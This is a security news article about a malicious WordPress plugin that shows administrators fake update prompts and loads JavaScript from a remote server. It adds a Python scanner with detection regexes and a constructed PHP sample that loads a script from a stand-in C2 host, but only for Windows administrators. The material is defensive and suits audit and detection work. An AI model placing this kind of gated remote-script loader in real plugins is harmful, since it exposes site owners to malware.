Targeted Attack via Malicious Plugin
A disruptive campaign has emerged, targeting WordPress administrators through a nefarious plugin known as “Modern Recent Posts.” This insidious add-on generates fraudulent notifications for browser and Java updates, leveraging social engineering to deceive users.
- Malware Tactics: The illicit campaign cunningly manipulates administrators of Windows systems into downloading and executing harmful software.
- Covert Mechanism: The plugin covertly injects malicious JavaScript sourced from a remote command-and-control server, incorporating self-update and self-destruction functionalities designed to elude detection.
Upon installation, this backdoor retains access to the compromised website, even if passwords are subsequently altered.
Malicious Plugin Hijacks Admin Dashboard with Deceptive Updates
The attack exploits the principles of social engineering, instilling urgency in users to “update” software to avert potential security threats. Sucuri has meticulously chronicled this campaign, unveiling an intricate WordPress plugin that features multiple malicious capabilities.
This plugin scrutinizes user roles, ensuring only those with administrator privileges can be targeted while also validating that the User-Agent string corresponds to a Windows operating system.
Once these parameters are satisfied, the plugin retrieves a JavaScript payload from a remote server, subsequently triggering the fraudulent update overlay.
The malware incorporates a persistence mechanism, drawn from persistence.js. store, which is currently detected on 28 websites. This lets attackers remotely update or remove the backdoor at will, prolonging their hold on the site.
Crucially, the most significant threat posed by this malware lies not within the website but rather on the administrator’s local machine. Interacting with the counterfeit update button initiates the download of an executable file, potentially leading to the installation of ransomware, information stealers, or Remote Access Trojans (RATs).
Strategies for Mitigating WordPress Security Vulnerabilities
To counteract these potential WordPress security threats, administrators are advised to expeditiously remove any unrecognized plugins. In the event that users engaged with the fraudulent update prompt, it is imperative to conduct a thorough malware scan on affected local machines.

Some recommendations include:
- Conducting an audit of all installed plugins and user accounts,
- Resetting credentials and implementing robust password policies,
- Employing a Web Application Firewall (WAF) to obstruct traffic to known malicious domains,
- Updating the WordPress core, alongside all plugins and themes, to their latest versions,
- Monitoring outbound traffic for connections to unfamiliar or dubious domains.
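As an added example (not code from the article or from Sucuri), a small Python heuristic that supports the plugin audit recommended above: it scans a plugin's PHP source for the co-occurring traits described earlier (an administrator-only gate, a Windows User-Agent check and a script loaded from a remote host) and rates the file. The regexes, the example domain and both sample snippets are constructed for this example.

```python
import re

# Heuristic indicators modelled on the behaviour described above. The regexes are
# generic PHP/WordPress idioms chosen for this example, not Sucuri signatures.
INDICATORS = {
    "admin_role_gate": re.compile(
        r"current_user_can\s*\(\s*['\"](?:administrator|manage_options)['\"]", re.I),
    "windows_ua_check": re.compile(r"HTTP_USER_AGENT.{0,120}?['\"]Windows", re.I | re.S),
    "remote_script_load": re.compile(
        r"(?:wp_enqueue_script|wp_register_script)\s*\([^)]*?['\"]https?://", re.I | re.S),
    "remote_fetch": re.compile(
        r"(?:file_get_contents|wp_remote_get|curl_init)\s*\(\s*['\"]https?://", re.I),
    "self_delete": re.compile(r"unlink\s*\(\s*__(?:FILE|DIR)__", re.I),
}

def scan_plugin_source(source: str) -> dict:
    """Return {indicator: match_count} for every indicator present in one PHP file."""
    hits = {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}
    return {name: n for name, n in hits.items() if n}

def assess(hits: dict) -> str:
    """Triage verdict. Any single indicator is common in benign plugins; the campaign
    above is defined by the co-occurrence of an admin-only gate, a Windows User-Agent
    check and a remotely sourced script, so that combination is rated high."""
    found = set(hits)
    if {"admin_role_gate", "remote_script_load"} <= found and \
            found & {"windows_ua_check", "self_delete", "remote_fetch"}:
        return "high"
    if found & {"remote_script_load", "remote_fetch", "self_delete"}:
        return "medium"
    return "low"

# Constructed samples: the first mimics only the gating logic described above (no
# payload; the remote host is a reserved example domain), the second is benign.
SUSPECT_PHP = """<?php
add_action('admin_enqueue_scripts', function () {
    if (current_user_can('administrator') &&
        strpos($_SERVER['HTTP_USER_AGENT'], 'Windows') !== false) {
        wp_enqueue_script('mrp', 'https://c2.example.invalid/update.js', [], null, true);
    }
});"""
BENIGN_PHP = """<?php
add_action('admin_enqueue_scripts', function () {
    wp_enqueue_script('mrp', plugins_url('assets/app.js', __FILE__), [], '1.0');
});"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PHP), ("benign", BENIGN_PHP)):
        print(label, assess(scan_plugin_source(src)), scan_plugin_source(src))
```

Point the scanner at each PHP file under wp-content/plugins and review anything rated medium or high by hand; a single hit on its own is not proof of compromise.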
Sucuri has also indicated that concealed WordPress backdoors, masquerading as plugins, have been responsible for creating rogue admin accounts. Attackers often leverage elements from legitimate plugins to establish these hidden access points.
Source link: Technadu.com.